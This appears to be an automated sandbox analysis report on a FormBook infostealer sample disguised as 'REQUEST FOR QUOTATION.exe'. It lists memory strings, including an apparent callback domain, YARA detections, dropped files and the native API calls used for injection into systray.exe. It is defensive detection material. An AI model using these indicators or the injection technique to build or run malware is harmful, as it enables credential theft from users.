Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/Best_Mortgage_Rates.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Blx
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/Cheap_Air_Tickets.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxTH
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/Free_Credit_Report.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxT
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/Migraine_Pain_Relief.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Bl
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/Top_10_Luxury_Cars.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxT
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/__media__/js/trademark.php?d=internationalsoccerteams.com&ty
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/display.cfm
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/px.js?ch=1
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/px.js?ch=2
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/sk-logabpstatus.php?a=UXhYSEV0T2dld2lXQUFVUld2WTU5ZWZmL2YvN0
Source: systray.exe, 00000008.00000002.924420530.0000000005839000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/xxg/
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/xxg/?GlW8J=aA1qKSLvfeXFRK5jYjV15J5OuKIkpVnYprgTABFHZ
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh0
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goo
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?g
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=16
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp	String found in binary or memory: https://ogs.google.com/widget/calloutprid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/?gws_rd=ssl
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/?gws_rd=sslLMEMh
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowse
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kt
Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/urlsa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQF
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: https://www.networksolutions.com/cgi-bin/promo/domain-search?domainNames=internationalsoccerteams.co

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware

Show sources

Source: C:\Windows\SysWOW64\systray.exe	Dropped file: C:\Users\user\AppData\Roaming\8LM54D1A\8LMlogri.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\systray.exe	Dropped file: C:\Users\user\AppData\Roaming\8LM54D1A\8LMlogrv.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: REQUEST FOR QUOTATION.exe

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041A060 NtClose,
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041A110 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_00419F30 NtCreateFile,
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_00419FE0 NtReadFile,
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041A05A NtClose,
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041A10A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_00419EEA NtCreateFile,
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_00419F2A NtCreateFile,
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_00419F84 NtCreateFile,NtReadFile,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9560 NtWriteFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9770 NtSetInformationFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9610 NtEnumerateValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051FAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F95F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051FA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051FA770 NtOpenThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051FB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051FA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9A10 NtQuerySection,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323A110 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323A060 NtClose,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_03239F30 NtCreateFile,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_03239FE0 NtReadFile,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323A10A NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323A05A NtClose,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_03239F2A NtCreateFile,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_03239F84 NtCreateFile,NtReadFile,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_03239EEA NtCreateFile,

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_018AA538
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_018A668F
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_018A66A0
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_018A664B
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_018ACE10
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CB5C2
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CBE79
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC589
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC4E9
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC44F
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC779
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC6D9
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC1D8
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC138
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC09B
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC3B2
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC312
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC278
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC9F4
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC954
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC8B9
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CC819
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CCB2B
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CCA8E
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CBFFB
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CBF5B
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058CBEC1
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041E808
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_00401030
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041DB0B
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041EB2D
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041E3C0
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041D3DE
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041DC1F
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041DD6F
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_00402D87
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_00402D90
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_00409E30
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041D705
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_00402FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05282D07
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B0D20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05281D55
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E2581
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052825DD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051CD5E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C841F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527D466
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05281FF1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0528DFCE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051D6E30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527D616
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05282EF7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BF900
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051D4120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0528E824
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271002
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA830
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052820A8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051CB090
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E20A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052828EC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05282B28
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DAB40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EEBB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527DBD2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052703DA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0526FA2B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052822AE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323DB00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323E3C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323D3DE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323E808
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_03222FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_03229E30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323DD6F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_03222D87
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_03222D90

Source: C:\Windows\SysWOW64\systray.exe

Code function: String function: 051BB150 appears 54 times

Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.671960019.0000000006D10000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs REQUEST FOR QUOTATION.exe
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.671960019.0000000006D10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs REQUEST FOR QUOTATION.exe
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.666776546.0000000000F78000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameISymbolReader.exe8 vs REQUEST FOR QUOTATION.exe
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.671747910.0000000006C10000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs REQUEST FOR QUOTATION.exe
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.670861847.00000000058B0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAsyncState.dllF vs REQUEST FOR QUOTATION.exe
Source: REQUEST FOR QUOTATION.exe, 00000005.00000002.710461060.00000000012AF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs REQUEST FOR QUOTATION.exe
Source: REQUEST FOR QUOTATION.exe, 00000005.00000002.711571251.0000000001693000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamesystray.exej% vs REQUEST FOR QUOTATION.exe
Source: REQUEST FOR QUOTATION.exe, 00000005.00000002.709469179.0000000000828000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameISymbolReader.exe8 vs REQUEST FOR QUOTATION.exe
Source: REQUEST FOR QUOTATION.exe	Binary or memory string: OriginalFilenameISymbolReader.exe8 vs REQUEST FOR QUOTATION.exe

Source: REQUEST FOR QUOTATION.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
